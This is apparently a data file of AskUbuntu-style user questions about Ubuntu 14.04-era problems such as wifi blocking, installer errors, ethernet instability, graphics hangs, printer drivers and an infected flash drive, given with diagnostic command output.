462225	wifi device not ready , but it is n't hard nor soft blocked	i 'm unable to connect to wifi on my toshiba satellite u200 , even though the wireless card does n't seem to be blocked : $ rfkill list 0 : toshiba bluetooth : bluetooth soft blocked : no hard blocked : yes 6 : phy0 : wireless lan soft blocked : no hard blocked : no note : when i boot it is blocked , but doing : modprobe -rfv iwl3945 rfkill unblock all modprobe -v iwl3945 unblocks it . the led does n't get turned on . using the hardware keys does n't change anything . the output of lshw is : $ sudo lshw -c network *-network disabled description : wireless interface product : pro/wireless 3945abg [ golan ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 02 serial : 00:18 : de:7d : ac : f4 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwl3945 driverversion=3.13.0-24-generic firmware=15.32.2.9 latency=0 link=no multicast=yes wireless=ieee 802.11abg resources : irq:42 memory : ffcff000-ffcfffff *-network description : ethernet interface product : pro/100 ve network connection vendor : intel corporation physical id : 8 bus info : pci @ 0000:03:08.0 logical name : eth0 version : 02 serial : 00:15 : b7:43:1c:56 size : 100mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e100 driverversion=3.5.24-k2-napi duplex=full ip=158.110.95.216 latency=64 link=yes maxlatency=56 mingnt=8 multicast=yes port=mii speed=100mbit/s resources : irq:20 memory : ffaff000-ffafffff ioport : bf40 ( size=64 ) and here are various information i collected : # # # # # release # # # # # distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty # # # # # kernel # # # # # linux pellicano 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:08:14 utc 2014 i686 i686 i686 gnu/linux # # # # # lspci # # # # # 02:00.0 network controller [ 0280 ] : intel corporation pro/wireless 3945abg [ golan ] network connection [ 8086:4222 ] ( rev 02 ) subsystem : intel corporation device [ 8086:1041 ] kernel driver in use : iwl3945 03:08.0 ethernet controller [ 0200 ] : intel corporation pro/100 ve network connection [ 8086:1092 ] ( rev 02 ) subsystem : toshiba america info systems device [ 1179:0001 ] kernel driver in use : e100 # # # # # lsusb # # # # # bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 002 : id 046d : c045 logitech , inc. optical mouse bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 002 : id 0483:2016 stmicroelectronics fingerprint reader bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub # # # # # pcmcia card info # # # # # prodid_1= '' '' prodid_2= '' '' prodid_3= '' '' prodid_4= '' '' manfid=0000,0000 funcid=255 # # # # # rfkill # # # # # 0 : toshiba bluetooth : bluetooth soft blocked : no hard blocked : yes 6 : phy0 : wireless lan soft blocked : no hard blocked : no # # # # # iw reg get # # # # # country 00 : ( 2402 - 2472 @ 40 ) , ( 3 , 20 ) ( 2457 - 2482 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 2474 - 2494 @ 20 ) , ( 3 , 20 ) , no-ofdm , passive-scan , no-ibss ( 5170 - 5250 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 5735 - 5835 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss # # # # # interfaces # # # # # # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback # # # # # iwconfig # # # # # wlan0 ieee 802.11abg essid : off/any mode : managed access point : not-associated tx-power=0 dbm retry long limit:7 rts thr : off fragment thr : off power management : off # # # # # route # # # # # tabella di routing ip del kernel destination gateway genmask flags metric ref use iface 0.0.0.0 158.110.95.1 0.0.0.0 ug 0 0 0 eth0 158.110.95.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 # # # # # resolv.conf # # # # # nameserver 127.0.1.1 # # # # # nm-tool # # # # # networkmanager tool state : connected ( global ) - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : iwl3945 state : unavailable default : no hw address : < mac address removed > capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points - device : eth0 [ connessione via cavo 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : e100 state : connected default : yes hw address : < mac address removed > capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 158.110.95.216 prefix : 24 ( 255.255.255.0 ) gateway : 158.110.95.1 dns : 158.110.104.32 dns : 158.110.1.7 # # # # # networkmanager.state # # # # # [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true # # # # # networkmanager.conf # # # # # [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=false # # # # # iwlist # # # # # # # # # # iwlist channel # # # # # wlan0 32 channels in total ; available frequencies : channel 01 : 2.412 ghz channel 02 : 2.417 ghz channel 03 : 2.422 ghz channel 04 : 2.427 ghz channel 05 : 2.432 ghz channel 06 : 2.437 ghz channel 07 : 2.442 ghz channel 08 : 2.447 ghz channel 09 : 2.452 ghz channel 10 : 2.457 ghz channel 11 : 2.462 ghz channel 12 : 2.467 ghz channel 13 : 2.472 ghz channel 34 : 5.17 ghz channel 36 : 5.18 ghz channel 38 : 5.19 ghz channel 40 : 5.2 ghz channel 42 : 5.21 ghz channel 44 : 5.22 ghz channel 46 : 5.23 ghz channel 48 : 5.24 ghz channel 52 : 5.26 ghz channel 56 : 5.28 ghz channel 60 : 5.3 ghz channel 64 : 5.32 ghz channel 100 : 5.5 ghz channel 104 : 5.52 ghz channel 108 : 5.54 ghz channel 112 : 5.56 ghz channel 116 : 5.58 ghz channel 120 : 5.6 ghz channel 124 : 5.62 ghz # # # # # lsmod # # # # # iwl3945 63619 0 iwlegacy 88016 1 iwl3945 mac80211 545990 2 iwl3945 , iwlegacy cfg80211 409394 3 iwl3945 , iwlegacy , mac80211 # # # # # modinfo # # # # # filename : /lib/modules/3.13.0-24-generic/kernel/drivers/net/wireless/iwlegacy/iwl3945.ko firmware : iwlwifi-3945-2.ucode license : gpl author : copyright ( c ) 2003-2011 intel corporation < ilw @ linux.intel.com > version : in-tree : s description : intel ( r ) pro/wireless 3945abg/bg network connection driver for linux srcversion : c93c31fcebbae1f376e495f alias : pci : v00008086d00004227sv*sd*bc*sc*i* alias : pci : v00008086d00004222sv*sd*bc*sc*i* alias : pci : v00008086d00004227sv*sd00001014bc*sc*i* alias : pci : v00008086d00004222sv*sd00001044bc*sc*i* alias : pci : v00008086d00004222sv*sd00001034bc*sc*i* alias : pci : v00008086d00004222sv*sd00001005bc*sc*i* depends : iwlegacy , cfg80211 , mac80211 intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions 686 signer : magrathea : glacier signing key sig_key : < mac address removed > :96 : dc:92 : b0:1d:75:9d:3e:85:62 : ea:32 : a1 : c7 sig_hashalgo : sha512 parm : antenna : select antenna ( 1=main , 2=aux , default 0 [ both ] ) ( int ) parm : swcrypto : using software crypto ( default 1 [ software ] ) ( int ) parm : disable_hw_scan : disable hardware scanning ( default 1 ) ( int ) parm : fw_restart : restart firmware in case of error ( int ) filename : /lib/modules/3.13.0-24-generic/kernel/drivers/net/wireless/iwlegacy/iwlegacy.ko license : gpl author : copyright ( c ) 2003-2011 intel corporation < ilw @ linux.intel.com > version : in-tree : description : iwl-legacy : common functions for 3945 and 4965 srcversion : 400f302be5c25b3c98a6ce8 depends : mac80211 , cfg80211 intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions 686 signer : magrathea : glacier signing key sig_key : < mac address removed > :96 : dc:92 : b0:1d:75:9d:3e:85:62 : ea:32 : a1 : c7 sig_hashalgo : sha512 parm : led_mode:0=system default , 1=on ( rf on ) /off ( rf off ) , 2=blinking ( int ) parm : bt_coex_active : enable wifi/bluetooth co-exist ( bool ) # # # # # modules # # # # # lp # # # # # blacklist # # # # # [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac blacklist wmi [ /etc/modprobe.d/fbdev-blacklist.conf ] blacklist arkfb blacklist aty128fb blacklist atyfb blacklist radeonfb blacklist cirrusfb blacklist cyber2000fb blacklist gx1fb # # # # # udev rules # # # # # # pci device 0x8086:0x1092 ( e100 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x8086:0x4222 ( iwl3945 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' # # # # # dmesg # # # # # [ 1336.469707 ] iwl3945 0000:02:00.0 : radio disabled by hw rf kill switch [ 1336.470773 ] iwl3945 0000:02:00.0 : radio disabled by hw rf kill switch does anybody know what 's the problem and how to fix it ?
462230	the installer encountered an error copying files to the hard disk , but the .iso file checksum is correct	i have 64-bit dell n5110 laptop . during ubuntu 14.04 installation , i received this error . i know the error is common , but i did n't find an answer , so please read below . [ errno 5 ] input/output error this is often due to a faulty cd/dvd disk or drive , or a faulty hard disk . it may help to clean the cd/dvd , to burn the cd/dvd at a lower speed , to clean the cd/dvd drive lens ( cleaning kits are often available from electronics suppliers ) , to check whether the hard disk is old and in need of replacement , or to move the system to a cooler environment . i 've had this error before , but back then i had problem with ubuntu .iso file ( checksum was n't correct ) . however , this time the checksum is correct . moreover , i used both ubuntu ( start-up app ) and windows ( universal-usb-installer ) ways for making bootable usb . both of them are giving me this error . if it means something , in `` md5sum.txt '' file on bootable usb the hash does n't match with the correct on . any suggestions ?
462233	unity does n't load ubuntu 14.04	i installed ubuntu 14.04 lts with wubi and after 2 days of use after the login screen unity does n't seem to load . notifications work so the cursor but only the backgroun appears and nothing else . what should i do ?
462236	strange ethernet behaviour of ubuntu 14.04 on fujitsu esprimo p720 e90+	after i had opensuse running on this machine without ethernet issues , i installed ubuntu 14.04 and ran into a weired ethernet problem . my colleague has ubuntu 12.04 on the same type of computer and no issues . my problem is , that approx . on 2 out of 3 times when i boot up , the ethernet connection would take very long to establish and then still not work ( ping would say `` destination host unreachable '' ) . here 's the output of ethtool eth0 : settings for eth0 : supported ports : [ tp ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full supported pause frame use : no supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full advertised pause frame use : no advertised auto-negotiation : yes speed : 1000mb/s duplex : full port : twisted pair phyad : 2 transceiver : internal auto-negotiation : on mdi-x : off ( auto ) can not get wake-on-lan settings : operation not permitted current message level : 0x00000007 ( 7 ) drv probe link link detected : yes and ethtool -i eth0 : driver : e1000e version : 2.3.2-k firmware-version : 0.13-4 bus-info : 0000:00:19.0 supports-statistics : yes supports-test : yes supports-eeprom-access : yes supports-register-dump : yes supports-priv-flags : no did someone ever have similar problems ? where should i start looking for a solution ? thanks ! edit 1 here 's the output of dmesg | grep eth0 on non-working state , if it helps somehow : dmesg | grep eth0 [ 1.800540 ] e1000e 0000:00:19.0 eth0 : registered phc clock [ 1.800542 ] e1000e 0000:00:19.0 eth0 : ( pci express:2.5gt/s : width x1 ) 90:1b:0e:1b:07:79 [ 1.800543 ] e1000e 0000:00:19.0 eth0 : intel ( r ) pro/1000 network connection [ 1.800593 ] e1000e 0000:00:19.0 eth0 : mac : 11 , phy : 12 , pba no : ffffff-0ff [ 7.018035 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 7.910448 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 7.910657 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 24.366988 ] e1000e : eth0 nic link is up 100 mbps full duplex , flow control : rx/tx [ 24.366991 ] e1000e 0000:00:19.0 eth0 : 10/100 speed : disabling tso [ 24.367023 ] ipv6 : addrconf ( netdev_change ) : eth0 : link becomes ready edit 2 so , i guess , i should do a bug report . does someone have suggestions on which useful information and context i should collect before reporting the bug ?
462246	ubuntu 14.04 - flash drives not working	i recently installed ubuntu 14.04 and now my flash drive do n't even blink when plugged in . i know they work as i can see them on boot and on my other computer just fine . the command `` lsusb '' just hangs and idles forever not returning anything . any ideas ? $ lsblk name maj : min rm size ro type mountpoint sda 8:0 0 698.7g 0 disk ├─sda1 8:1 0 693.2g 0 part / ├─sda2 8:2 0 1k 0 part └─sda5 8:5 0 5.5g 0 part [ swap ] sr0 11:0 1 1024m 0 rom dmesg output is here
462248	metronome for gnome desktop	does anybody know about a metronome that resembles a real one ? look at this online version http : //simple.bestmetronome.com/ that is exactly what i am looking for , but installable instead of online . thnx .
462250	hide title bar in gnome 3.12	i have ubuntu 14.04 and gnome 3.12 ( using a dark theme ) and in some applications i have now a big , white title bar . how can i remove title bar of an application ? in gnome 3.10 i used gnome-shell-extension pixel saver but now this extensions is outdated .
462251	system hangs frequently	environment system spec : lenovo ideapad u310 haswell-based pentium 3556u cpu , 4gb ram , no discrete graphics . installed ubuntu 12.04.4 lts with gnome-fallback session ( from official repo ) repository using : precise / precise-security / precise-update / precise-backports with main , universe , multiverse , restricted . 3rd party`s repo : libreoffice/ubuntu for libreoffice , tualatrix/ubuntu for ubuntu tweak , spotify for spotify , tomahawk/ubuntu for tomahawk ( no system-related 3rd party package are used ) xserver-xorg-core version : 2:1.14.5-1ubuntu2~saucy1~precise2 , xserver-xorg-video-intel version : 2.99.904-0ubuntu2.1~precise1 problem problem : system totally hangs very frequently . ( i suffered 8+ times during last 24 hours ) when it occur : when i use firefox ( with multiple tabs ) and scroll down/up for some page , system hangs . it never occurs on very simple pages ( like linux-related pages or online documents ) , but it occurs frequently ( and randomly ) while i`m suffering some pages with pictures , banners , flashes , etc . sometimes system stuck on hangs while using ( as a foreground ) other programs ( like libreoffice ) , while firefox have opened already . i think there are several stages on system hanging . 1 ) ( while i 'm browsing with firefox ) mouse moves , but system does not response . no changes in other windows . ( i 'm using system-monitor widget for monitoring my system , and if system hangs then updating of widget is stopped ) keyboard sometimes works at that moment . ( not always ) so i can use other ttys by pressing ctrl + alt + 1 . after move to ttys , and i usually go back to original gnome session . then it works fine . i can find some logs in /var/log/syslog : kernel : [ 970.227645 ] [ drm : i915_hangcheck_elapsed ] *error* stuck on render ring kernel : [ 970.227655 ] [ drm ] capturing error event ; look for more information in /sys/kernel/debug/dri/0/i915_error_state also there are some related logs on xorg.0.log ( i can not put anything , since it is quite long ) : ( ee ) [ mi ] eq overflowing . additional events will be discarded until existing events are processed . ( ee ) ( ee ) backtrace : ( ee ) 0 : /usr/bin/x ( xorg_backtrace+0x34 ) [ 0x7f50a99cd1e4 ] ( ee ) 1 : /usr/bin/x ( mieqenqueue+0x263 ) [ 0x7f50a99ad733 ] ( ee ) 2 : /usr/bin/x ( 0x7f50a9816000+0x6adf4 ) [ 0x7f50a9880df4 ] ( ee ) 3 : /usr/lib/xorg/modules/input/evdev_drv.so ( 0x7f50a2300000+0x5e08 ) [ 0x7f50a2305e08 ] ( ee ) 4 : /usr/bin/x ( 0x7f50a9816000+0x95de7 ) [ 0x7f50a98abde7 ] ( ee ) 5 : /usr/bin/x ( 0x7f50a9816000+0xc1627 ) [ 0x7f50a98d7627 ] ( ee ) 6 : /lib/x86_64-linux-gnu/libpthread.so.0 ( 0x7f50a8b3c000+0xfcb0 ) [ 0x7f50a8b4bcb0 ] ( ee ) 7 : /lib/x86_64-linux-gnu/libc.so.6 ( ioctl+0x7 ) [ 0x7f50a787cc67 ] ( ee ) 8 : /usr/lib/x86_64-linux-gnu/libdrm.so.2 ( drmioctl+0x28 ) [ 0x7f50a89342e8 ] ( ee ) 9 : /usr/lib/x86_64-linux-gnu/libdrm_intel.so.1 ( 0x7f50a3a2b000+0x60bf ) [ 0x7f50a3a310bf ] also , in this stage , i can push alt+prtsc ( sysrq ) + b ( do reboot ) , and it works fine . 2 ) if system hangs and i do n't do anything for 3~7 seconds , then mouse pointer does not moves anymore , also keyboard wo n't work too . ( ctrl+alt+number , sysrq magic keys , ctrl+alt+del ) at that moment , nothing i can do remains , except for push reset button on my laptop . also , it usually does not gives any information on logs . what i`ve tested 1 ) web browser-related removing adobe flash : still hangs . removing addons ( like ad blocker ) : still hangs . turing off hw acceleration : still hangs . using chrome/chromium : still hangs . 2 ) x.org related ( http : //wiki.archlinux.org/index.php/intel_graphics ) adding i915.semaphores=1 to boot parameter : still hangs . changing accelmethod from sna to uxa : still hangs 3 ) other version of ubuntu ubuntu 14.04 : still hangs 4 ) connect gdb on xorg ( refer towww.x.org/wiki/development/documentation/serverdebugging and wiki.ubuntu.com/x/backtracing ) when system hangs , connection of ssh is lost ( no input or output ) and it is impossible to connect another ssh . so i can not backtrack anything related to system hang . i think i tested pretty much , but none is succeed . what i can do it for solving this problem ? is there are more informations or tests required to post bugs on launchpad or xorg bug tracker ?
462252	unstable wired ethernet network connection after upgrading from 13.10 to 14.04 ( amd64 )	recently i upgrade my system from 13.10 to 14.04 , after a week i faced unstable wired network connection issue . checked network manager it shows connection as ok. below is the detail information of system : 1 ) network manager information nm-tool networkmanager tool state : connected ( global ) device : eth0 [ auto ethernet ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : wired driver : tg3 state : connected default : yes hw address : 00:25:64 : c7:5d:87 capabilities : carrier detect : yes speed : 1000 mb/s wired properties carrier : on ipv4 settings : address : 172.20.150.51 prefix : 24 ( 255.255.255.0 ) gateway : 172.20.150.254 dns : 172.20.50.4 dns : 172.20.50.12 2 ) kernel name uname -r kernel version : 3.13.11-031311-generic network card information : command : lspci -vnn | grep -i net o/p : 02:00.0 ethernet controller [ 0200 ] : broadcom corporation netlink bcm57780 gigabit ethernet pcie [ 14e4:1698 ] ( rev 10 ) system information : dell optiplex 380 amd-64
462253	gnome shell extension development	i do my first steps in developing gnome 3 shell extensions . actually i try to realize this simple thing : i want to suppress the annoying `` application xyz is ready '' notification . after a bit of research i found out , that this class is responsible : windowattentionhandler from /usr/share/gnome-shell/js/ui/windowattentionhandler.js this includes an event handler method called `` _onwindowdemandsattention '' which sends the notification . a quick and dirty test by commenting out the responsible code in this method leads to what i want : no more `` application xyz is ready '' notification any longer . for not to be such dirty by hacking the original sources i want to write a little shell extension which overloads the `` windowattentionhandler._onwindowdemandsattention '' method with nothing more than a simple `` return '' . it can be read here https : //wiki.gnome.org/projects/gnomeshell/extensions/stepbysteptutorial under `` how extends functionality '' that one can simply overload a function by using the .prototype . after researching the correct syntax i now have an extension with this simple code in extension.js just for testing if it works : const windowattentionhandler = imports.ui.windowattentionhandler ; function init ( ) { } function enable ( ) { windowattentionhandler.windowattentionhandler.prototype._onwindowdemandsattention=function ( display , window ) { return ; } } function disable ( ) { } enabling the extension and restarting gnome shell raises no error ( nothing in gnome session logs or in lookingglass ) but it does n't work either : the `` application xyz is ready '' notifications are still appearing . i can make sure that the extension is really loaded by adding some debug output ( log ( `` blaa '' ) ) in the `` init '' or `` enable '' functions . any hint what i am doing wrong ? or do i have to use a different solution ? thx in advance !
462259	ubuntu 14.04 - pointer becomes invisible randomly	my mouse pointer becomes invisible randomly while using my computer . i 've seem other posts and people suggest looking for an unknown display under `` system settings > screen '' display but i do n't see anything called unknown display ; the only display is called `` built-in display '' . any ideas ?
462265	remove recycler directory from virus infected flash drive	before you advise me on the option of saving my files and formatting the drive using gparted , please understand that i could have done that hours back and that would have taken only a few minutes . actually , i want to understand , what is really happening here . the situation is trashing all my experiences gained over the years . i was under the impression that if i insert a virus infected flash drive to my ubuntu machine , all i need to do is to simply delete the virus files and i am good to go . today , i collected some files in an ntfs formatted flash drive from a windows machine fully knowing that the machine is virus infected . when i inserted the flash drive to my machine , i found that indeed , it has collected many files and folders . i have deleted most of them . the only one showing hard resistance is a recycler directory ( and its subdirectories ) . the attributes of this directory . drwx -- -- -- 1 masroor masroor 4.0k may 7 16:01 recycler/ if i execute the rm command , sudo rm -rvf recycler/ i get a long output in the line of , rm : can not remove `recycler/s-2-4-27-3777257131-1806073332-421880436-8537/oagfraix.exe ' : input/output error rm : can not remove `recycler/s-2-4-27-3777257131-1806073332-421880436-8537/vijbcvrj.cpl ' : input/output error < rest snipped > what is interesting , the above reported files are shown by the ls command with some myriad set of attributes . ls -l recycler/s-2-4-27-3777257131-1806073332-421880436-8537/ ls : can not access recycler/s-2-4-27-3777257131-1806073332-421880436-8537/oagfraix.exe : input/output error ls : can not access recycler/s-2-4-27-3777257131-1806073332-421880436-8537/vijbcvrj.cpl : input/output error total 0 - ? ? ? ? ? ? ? ? ? ? ? ? ? ? oagfraix.exe - ? ? ? ? ? ? ? ? ? ? ? ? ? ? vijbcvrj.cpl if try to find the attributes of those offending folders , ls -dl recycler/s-2-4-27-3777257131-1806073332-421880436-8537/ i get , drwx -- -- -- 1 masroor masroor 4096 may 7 15:58 recycler/s-2-4-27-3777257131-1806073332-421880436-8537/ command chmod to make the recycler folder world writable fails . sudo chmod -vr ugo+w recycler/ the output is in the line of . mode of `recycler/ ' changed from 0700 ( rwx -- -- -- ) to 0722 ( rwx-w -- w- ) mode of `recycler/s-2-4-27-3777257131-1806073332-421880436-8537 ' changed from 0700 ( rwx -- -- -- ) to 0722 ( rwx-w -- w- ) chmod : can not access `recycler/s-2-4-27-3777257131-1806073332-421880436-8537/oagfraix.exe ' : input/output error < snipped > these folders contained a number of .exe and other files most of which i have already deleted successfully ( except the above reported ones ) . if i check the attributes of one of these folders , lsattr -ad recycler/s-2-4-27-3777257131-1806073332-421880436-8537/ i get lsattr : inappropriate ioctl for device while reading flags on recycler/s-2-4-27-3777257131-1806073332-421880436-8537/ i have run clamtk on this device as suggested here . however , it fails to find a threat . i understand that i can simply save my flash drive contents somewhere and then format it . however , i am more interested in finding out which attributes have been set in these folders which are resisting further changes . ( and definitely , i will want to disinfect my flash drive as well . ) update 1 further to the comment from patro . when the folders are visited , those files with myriad attributes are not shown , even when i try to view them as hidden files . deleting these files fails . the command rm -rvf * inside the directory s-2-4-27-3777257131-1806073332-421880436-8537 fails with input/output error . update 2 after the comments from soulsource and girardengo i have tried to run ntfsck and ntfsfix . also , this question helped . here are the outputs . ntfsck sudo ntfsck /dev/sdc1 unsupported : replay_log ( ) unsupported : check_volume ( ) checking 7796 mft records . unsupported cases found . ntfsfix sudo ntfsfix -d /dev/sdc1 mounting volume ... ok processing of $ mft and $ mftmirr completed successfully . ntfs volume version is 3.1 . ntfs partition /dev/sdc1 was processed successfully . but the initial situation still persists . there has not been any improvement . update 3 ( solved ) as advised in this post , i inserted my drive in a windows machine and executed ( from a terminal ) , chkdsk < drive letter > /r there was a flurry of activities about checking and repairing . there were some messages regarding bad sectors as well . the task was finished in less than a minute . then i found that some new folders have been created for recovered areas . i reinserted the flash drive to a linux machine , and the recycler folder could be deleted without any problem . as an added step , now i have formatted the drive ( using gparted , to ntfs ) since i think that i have gained my insight . looks like the virus is indeed capable of causing ( temporary/soft ) hardware problem . please see the above mentioned post for a detailed technical explanation .
462271	windows 7 not recognised in installation	i tried to install ubuntu 14.04 to dual boot on this windows 7 64 bit laptop , but it did n't recognise windows . last week this machine failed to boot in windows and all the samsung recovery options failed , and i did n't have a system disc , so i downloaded windows 7 from the official digitalriver site , and managed to install it ok. from reading other threads it looks like that may be why it 's not being recognised . i just managed to install boot-repair and was given the following url to share on the forum : http : //paste.ubuntu.com/7409913/ thanks for your help , andrew p.s . i would n't mind too much using the bios to dual boot . there 's 500gb altogether , and 250gb free space . could i just install ubuntu there , and then set the bios to boot to windows or ubuntu ?
462272	ca n't login to ubuntu 14.04	i installed ubuntu 14.04 ( dual boot with win 7 ) and it was working fine . but suddenly one fine day i ca n't login to my user account , when i log it just flashes and then it goes back to the login screen . but the odd thing is that i can log with the guest account . i have 2 accounts one owner account/user account and another one created for the installation of oracle . only the guest account can login . from the login screen , i have pressed ctrl+alt+f1 to get to a prompt , and login but the same thing happened there too , i entered the correct username and credentials but it flashed and goes back to the login screen .
462276	how to find a word in text files from a directory	suppose that i have a directory with name _file and includes two sub directory like _1 and _2 and on each one i have some text files . i want to search a word like foo in one of these text files . how i can do that ? i want to know which text files in the whole directory contain that word ?
462277	canon lbp6200d printer does not work after upgrading to ubuntu 14	after upgrading from ubuntu 13.10 to ubuntu 14.04 my canon capt printer lbp6200d does not work , even though i reinstalled the drivers manually . what changed ? is there a bug ? i tried the troubleshooting steps . the status monitor works ( see output below ) . i then tried verifying the existence of /var/ccpd/fifo0 . it said it could not find directory or file . i then tried to manually install it as suggested . it said the file existed . printer still does not print . output following gerhard @ gerhard-desktop : ~ $ sudo ccpdadmin -p lbp6200 -o /dev/usb/lp0 [ sudo ] password for gerhard : cups_configpath = /etc/cups/ log path = none ui port = 59787 entry num : spooler : backend : fifo path : device path : status [ 0 ] : lbp6200 : ccp : //localhost:59787 : /dev/usb/lp0 : modified gerhard @ gerhard-desktop : ~ $ ls -l /var/ccpd ls : zugriff auf /var/ccpd nicht möglich : datei oder verzeichnis nicht gefunden gerhard @ gerhard-desktop : ~ $ sudo mkdir /var/ccpd mkdir : das verzeichnis »/var/ccpd“ kann nicht angelegt werden : die datei existiert bereits gerhard @ gerhard-desktop : ~ $ sudo mkfifo /var/ccpd/fifo0 gerhard @ gerhard-desktop : ~ $ sudo chown -r lp : lp /var/ccpd gerhard @ gerhard-desktop : ~ $ ^c gerhard @ gerhard-desktop : ~ $ sudo ccpdadmin -p lbp6200 -o /dev/usb/lp0 cups_configpath = /etc/cups/ log path = none ui port = 59787 entry num : spooler : backend : fifo path : device path : status [ 0 ] : lbp6200 : ccp : //localhost:59787 : /dev/usb/lp0 : modified gerhard @ gerhard-desktop : ~ $ ^c gerhard @ gerhard-desktop : ~ $
462278	14.04 : menus no longer visible in the unity panel	i ran the updates on ubuntu 14.04 this morning and now the programme menus are no longer visible in the panel . in this image the mouse is over the panel but no menu are shown : i can still access the menus with hud but i do not think this how unity is supposed to work . which package updates could have caused this change in behaviour ? update i : after turning the system on this morning the panel is back to normal ; whatever caused this strange behaviour is probably not related to a corrupted package .
462285	upgrading to 14.04 from 12.04	i have a dual boot configuration ( ms windows 7 , ubuntu 12.04 ) and i 'm using grub2 . how do i upgrade without breaking anything ? this is my work laptop and i need to make sure that nothing will break . is it possible without doing a clean install ( installing 14.04 on top of 12.04 ) ? thanks .
462288	failed upgrade to 14.04 - /tmp not mounted properly and uuids missing from /etc/fstab	i have an old pc with dual boot to windows vista ( windows fails to boot though because of an unrepaired avgidshx.sys issue , another story ) , and on this pc i attempted an upgrade from ubuntu 13.10 to 14.04 using the software updater . but the upgrade process froze midway . i had to restart the pc , and an error screen then showed the disk drive for /tmp is not ready yet or not present . leaving it from here resulted in an unresponsive black screen , whereas shift + m started a bash shell . from the bash shell : $ ls -ld /tmp showed these permissions : drwxrwxrwt /tmp listed in a green colour ( because of its executable perms ? ) and it contained some data . i could n't move or re-create /tmp and : $ rm -rf /tmp can not remove ' ... ' : read-only file system i could n't remount /tmp either : $ mount -o remount , rw /tmp /tmp not mounted or bad option i could n't check for matching blkid 's because cat /etc/fstab contained no uuids . i tried running fsck /tmp but that did n't work either ( i do n't remember the error message , but it might have recommended trying e2fsck ) my question to the community : is this pc beyond repair , or , how can it be salvaged ? i have a boot repair disc obtained from http : //sourceforge.net/p/boot-repair/home/home/ which , when run , reports the problem is repaired & that i may reboot . but on rebooting i return to the /tmp is not ready yet screen .
462290	multipathing issue with dell powervault md3660f	iâm configuring a dell pv md3660f storage . its directly attached to a r320 server ( by fc hba ) and the server is running ubuntu 12.04 . for redundancy i have connected two fc hba with both controllers of the storage and in storage i 've configured both ports as a single host and mapped with a 500gb volume , but in the server showing two 500gb volume as sdc & sdd . in this scenario , how can i get it as a single volume with redundancy ?
462297	slow performance on vmware player 4.0.6 build-1035888	ubuntu 13.04 is working slow on vmware player 4.0.6 build-1035888 please suggest what should be the reason and how it can be faster ?
462301	ubuntu does not restart after installation	i am attempting to install ubuntu 14.04 64-bit version on virtualbox . when i click on restart now button on the installation complete dialog box ( last step in installation ) , the os appears to be performing certain checks but stays there for a long time . does not complete restart process to get to the login screen . what am i missing ?
462302	how to setup canon imageprograf ipf605 ?	i need help setting up canon imageprograf ipf605 network ploter . i found drivers here : http : //software.canon-europe.com/products/0010633.asp but i ca n't make it work . printer is recognized in printer app but test page wo n't print .
462303	oem install in xenserver guest	i am using a xenserver 6.2 pool with many windows 2008/2012 servers as guests , which i have used sysprep with to create templates to deploy new servers in minutes . very cool . i now need to achieve this with ubuntu . i have created a vm and used ubuntu server 12.04 lts to do an `` oem install '' with the aim of booting the machine , adding some things like ssh server and custom apt repositories , then run `` oem-prepare '' ( or whatever it is ) and convert my vm into a template . however , after installing the os and waiting for the system to boot it is getting stuck with the stage `` stopping enable remaining boot-time encrypted block devices '' - and goes no further . can anyone shed some light on this at all ? update this also happens in 12.04.4 too - so i have come to the conclusion that oem install is broken in ubuntu server
